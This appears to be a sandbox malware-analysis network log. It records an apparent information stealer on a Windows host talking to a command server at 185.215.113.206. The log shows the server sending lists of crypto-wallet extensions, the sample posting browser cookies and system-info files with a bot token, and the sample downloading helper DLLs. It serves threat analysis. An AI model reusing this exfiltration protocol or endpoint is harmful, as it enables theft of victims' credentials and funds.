Nov 10, 2024 04:54:59.871711016 CET	224	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxw
Nov 10, 2024 04:54:59.871721029 CET	1236	IN	Data Raw: 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d 6c 6c 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d Data Ascii: Z2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamt
Nov 10, 2024 04:54:59.871732950 CET	1236	IN	Data Raw: 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 Data Ascii: fDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J
Nov 10, 2024 04:54:59.871824980 CET	1236	IN	Data Raw: 62 32 52 6f 61 57 56 76 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 Data Ascii: b2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1
Nov 10, 2024 04:54:59.871836901 CET	940	IN	Data Raw: 59 57 78 73 5a 58 52 38 59 32 35 75 59 32 31 6b 61 47 70 68 59 33 42 72 62 57 70 74 61 32 4e 68 5a 6d 4e 6f 63 48 42 69 62 6e 42 75 61 47 52 74 62 32 35 38 4d 58 77 77 66 44 42 38 52 57 78 73 61 53 41 74 49 46 4e 31 61 53 42 58 59 57 78 73 5a 58 Data Ascii: YWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8b2NqZHBtb2FsbG1nbWpiYm9nZmlpYW9mcGhiamdjaGh8MXwwfDB8VmVub20gV2FsbGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2N
Nov 10, 2024 04:54:59.876475096 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHDHJJJECFIECBGDGCAA Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 2d 2d 0d 0a Data Ascii: ------DHDHJJJECFIECBGDGCAAContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------DHDHJJJECFIECBGDGCAAContent-Disposition: form-data; name="message"fplugins------DHDHJJJECFIECBGDGCAA--
Nov 10, 2024 04:55:00.155689955 CET	335	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:00 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Nov 10, 2024 04:55:00.262255907 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJEC Host: 185.215.113.206 Content-Length: 7335 Connection: Keep-Alive Cache-Control: no-cache
Nov 10, 2024 04:55:00.262290001 CET	7335	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 Data Ascii: ------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Nov 10, 2024 04:55:01.065853119 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 10, 2024 04:55:01.342032909 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 10, 2024 04:55:01.620311022 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:01 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Nov 10, 2024 04:55:01.620326042 CET	112	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @
Nov 10, 2024 04:55:01.620337009 CET	1236	IN	Data Raw: 10 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49726	185.215.113.206	80	1868	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:55:09.909091949 CET	629	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCFHDHIIIECBGCAKFIJ Host: 185.215.113.206 Content-Length: 427 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------AFCFHDHIIIECBGCAKFIJContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------AFCFHDHIIIECBGCAKFIJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AFCFHDHIIIECBGCAKFIJContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------AFCFHDHIIIECBGCAKFIJ--
Nov 10, 2024 04:55:11.336850882 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 10, 2024 04:55:11.549520016 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIEC Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file"------GIECFIEGDBKJKFIDHIEC--
Nov 10, 2024 04:55:12.336067915 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49771	185.215.113.206	80	1868	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:55:18.889647961 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDG Host: 185.215.113.206 Content-Length: 3087 Connection: Keep-Alive Cache-Control: no-cache
Nov 10, 2024 04:55:18.889777899 CET	3087	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 Data Ascii: ------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="file_name"Y29va2llc1xNa
Nov 10, 2024 04:55:20.290870905 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 10, 2024 04:55:20.461807966 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file"------JKFIDGDHJEGIEBFHDGDG--
Nov 10, 2024 04:55:21.242672920 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 10, 2024 04:55:21.988495111 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 10, 2024 04:55:22.374803066 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:22 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Nov 10, 2024 04:55:22.374814034 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVE
Nov 10, 2024 04:55:22.374928951 CET	1236	IN	Data Raw: 85 c0 74 1e 8b 75 1c 8b 7d 14 8b 55 10 8b 4d 0c 85 ff 74 22 f2 0f 10 07 f2 0f 11 80 30 01 00 00 eb 28 68 05 e0 ff ff e8 7f 0b 08 00 83 c4 04 b8 ff ff ff ff eb 26 c7 80 34 01 00 00 a6 a6 a6 a6 c7 80 30 01 00 00 a6 a6 a6 a6 6a 10 56 6a 00 6a 00 52 Data Ascii: tu}UMt"0(h&40jVjjRQP?^_]USWVhO?t081tkEU]Mt0%h1<40jRjjPQWt8
Nov 10, 2024 04:55:22.375010967 CET	1236	IN	Data Raw: 00 0f 84 98 02 00 00 8b 75 18 85 f6 0f 84 8d 02 00 00 89 54 24 34 89 44 24 30 89 f8 83 e0 f8 50 e8 88 06 08 00 83 c4 04 85 c0 0f 84 7c 02 00 00 89 c3 89 f8 c1 ef 03 8d 4f ff 89 4c 24 38 50 56 53 e8 27 07 08 00 83 c4 0c f2 0f 10 03 f2 0f 11 44 24 Data Ascii: uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$\|$
Nov 10, 2024 04:55:22.375055075 CET	424	IN	Data Raw: 89 45 d8 8d 45 dc 89 f9 31 d2 ff 75 1c ff 75 18 53 50 56 8d 45 e0 50 e8 b4 fa ff ff 83 c4 18 89 c7 85 ff 0f 85 6f 01 00 00 b9 01 e0 ff ff 39 5d dc 0f 85 53 01 00 00 8b 55 e0 0f ca b8 a6 59 59 a6 29 d0 81 c2 5a a6 a6 59 09 c2 0f b6 45 e4 0f b6 4d Data Ascii: EE1uuSPVEPo9]SUYY)ZYEME]M)19DEEE\|0)U\|2!!)]\|3)\|3!)
Nov 10, 2024 04:55:22.375066042 CET	1236	IN	Data Raw: 83 c4 0c 8b 45 d8 85 c0 74 0a 53 50 e8 5c 00 08 00 83 c4 08 8b 4d f0 31 e9 e8 9a fe 07 00 89 f8 83 c4 24 5e 5f 5b 5d c3 55 89 e5 53 57 56 8b 75 08 85 f6 74 3a 8b 7d 0c 8b 1e 85 db 74 24 8b 46 04 8b 48 0c ff 15 00 80 0a 10 6a 01 53 ff d1 83 c4 08 Data Ascii: EtSP\M1$^_[]USWVut:}t$FHjShjVPt^_[]^_[]USWV}tVEGGHtIUuu@t0t,GHjShv1
Nov 10, 2024 04:55:22.375076056 CET	1236	IN	Data Raw: ff 83 c4 08 85 c0 74 1c 8b 3e 85 ff 74 20 8b 46 04 8b 48 0c ff 15 00 80 0a 10 6a 01 57 ff d1 83 c4 08 eb 0a 8b 45 ec 8b 4d f0 89 08 31 db 89 d8 83 c4 08 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 8b 75 08 8b 3e 8b 46 04 Data Ascii: t>t FHjWEM1^_[]USWVu>FHW>FHXSVW^_[]USWVu}E@HWVS^_[]USWVPM}G9vhuHuVu
Nov 10, 2024 04:55:22.375088930 CET	24	IN	Data Raw: 01 d7 0f b6 8c 05 f0 fe ff ff 01 f9 0f b6 f9 0f b6 1c 3e 88 1c 06 88 14 Data Ascii: >
Nov 10, 2024 04:55:22.375323057 CET	1236	IN	Data Raw: 3e 83 c0 02 eb b2 66 c7 86 00 01 00 00 00 00 89 f7 8b 4d f0 31 e9 e8 dd f4 07 00 89 f8 81 c4 08 01 00 00 5e 5f 5b 5d c3 55 89 e5 83 7d 0c 00 74 10 68 02 01 00 00 ff 75 08 e8 6f f6 07 00 83 c4 08 5d c3 cc cc cc cc cc 55 89 e5 56 8b 75 1c 8b 45 14 Data Ascii: >fM1^_[]U}thuo]UVuE9sh;UMVuPu^]USWV4MEE9EshyU}]E}}aM}
Nov 10, 2024 04:55:22.375334024 CET	1236	IN	Data Raw: f4 e9 66 0f 70 f5 e8 66 0f 70 c9 f5 66 0f f4 cc 66 0f 70 c9 e8 66 0f 62 f1 66 0f eb f2 66 0f 6f d0 66 0f fe 15 f0 20 08 10 83 c8 08 66 0f 6e 0c 07 66 0f 60 cb 66 0f 61 cb 66 0f 72 f2 17 66 0f 6f 2d e0 20 08 10 66 0f fe d5 f3 0f 5b d2 66 0f 70 e1 Data Ascii: fpfpffpfbffof fnf`fafrfo- f[fpffpffof%!fpfpfbfnTf`faffrf[fpffpffpfpfbff!~sMEMEUxE
Nov 10, 2024 04:55:23.441951036 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 10, 2024 04:55:23.722048998 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:23 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 